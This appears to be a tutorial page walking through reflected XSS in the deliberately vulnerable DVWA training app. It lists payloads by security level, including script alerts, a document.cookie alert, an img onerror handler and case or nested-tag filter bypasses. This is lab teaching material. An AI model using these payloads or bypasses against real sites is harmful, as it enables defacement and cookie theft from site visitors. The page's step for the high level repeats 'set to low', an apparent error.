cybNg.com

DVWA XSS(Reflected)

Previous Next

Let's write our message on the main webpage and delete or replace the main content of the page.


What is XSS (Reflected)

Deface ?, When we change the content of any webpage according to our own, it is called Deface attack.You must have seen many times when a hacker writes his message on the main page of a website, it is called a deface attack.

Security Low

  1. First set security lavel to low
  2. Now open the Xss (Reflected) page
  3. Do with this example , just copy and paste it on your input box and submit it.
<script> alert("Page attack by cybNg");</script>
<script> alert(document.cookie);</script>

💡 Tip: You can use the all XSS attack on the low security

Security Medium

  1. First set security lavel to medium
  2. Now open the Xss (Reflected) page
  3. Do with this example , just copy and paste it on your input box and submit it.
<img src=x onError=alert('Page attacked by cybNg')>
<scr<script>ipt> alert("Page attacked by cybNg");</script>
<sCript> alert("Page attacked by cybNg");</script>

Security High

  1. First set security lavel to low
  2. Now open the Xss (Reflected) page
  3. Do with this example , just copy and paste it on your input box and submit it.
<img src=1 onerror=alert("Page attack by cybNg")>

💡 Tip: Security lavel Impossible is filter by htmlspecialchars() so it can't be bypass


Previous Next
cybNg Designed for learning, testing and training. Examples are simplified to improve reading and basic understanding, tutorials and examples are constantly reviewed to avoid over-comprehension and errors, but we cannot warrant the complete accuracy of all content. While using this site, you agree to read and accept our use, cookie and privacy policy. All the information given in it is made for education purpose only, there will be no responsibility of this website or this organization for misuse of the information given in it. We hope that all the information provided in it is good for our students. So that it helps improve the cyber world.